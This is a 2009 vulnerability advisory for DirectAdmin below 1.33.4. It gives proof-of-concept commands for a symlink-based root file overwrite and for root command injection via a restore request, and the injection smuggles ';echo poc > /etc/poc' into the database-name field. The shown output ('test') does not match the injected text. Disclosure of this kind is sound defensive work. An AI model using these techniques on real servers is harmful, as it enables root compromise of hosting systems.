DirectAdmin versions below 1.33.4 suffer from a local file overwrite and local root escalation vulnerabilities.
2fdd4977d213bb5c2935ac3f55fed30ddd739101b5af3e32b4eaf8b45c8688f5
Subject: DirectAdmin < 1.33.4 Local file overwrite & Local root escalation
Author: Anonymous
ReleaseID: d8253f15e447935c24ab38a215735931942a77717d7b55d84200d070d1e54d3b
Date: 22-04-2009
The issue on http://www.directadmin.com/features.php?id=968 is larger than
the wording would indicate.
It fixes two issues in /CMD_DB.
--- Local file overwrite ---
action=backup runs a mysqldump as root and generates a predictable temporary
file in the temporary directory defined as tmpdir in
/usr/local/directadmin/conf: "$tmpdir/${dbname}.gz".
It does not check if the file exists before piping the output of "mysqldump
| gzip" into it, allowing any DA user to create or overwrite any file on the
server as root.
PoC:
On server: $ ln -s /etc/poc /home/tmp/database_name.gz
On client: $ curl http://directadminserver:2222/CMD_DB/database_name.gz
On server:
$ ls -la /etc/poc
-rw-r--r-- 1 root root 514 Apr 22 09:05 /etc/poc
$ zcat /etc/poc | head -1
-- MySQL dump 10.9
--- Local root escalation ---
action=restore runs a "gunzip | mysql $dbname" as root, with $dbname being
unchecked, allowing any DA user to run any code as root.
PoC:
On client: curl -n -F action=restore -F domain=poc.com -F
'file1=@database.gz' -F method=default -F 'name=poc_db;echo poc > /etc/poc'
http://directadminserver:2222/CMD_DB
On server:
$ ls -la /etc/poc
-rw-r--r-- 1 root root 5 Apr 22 10:30 /etc/poc
$ cat /etc/poc
test
--
Anonymous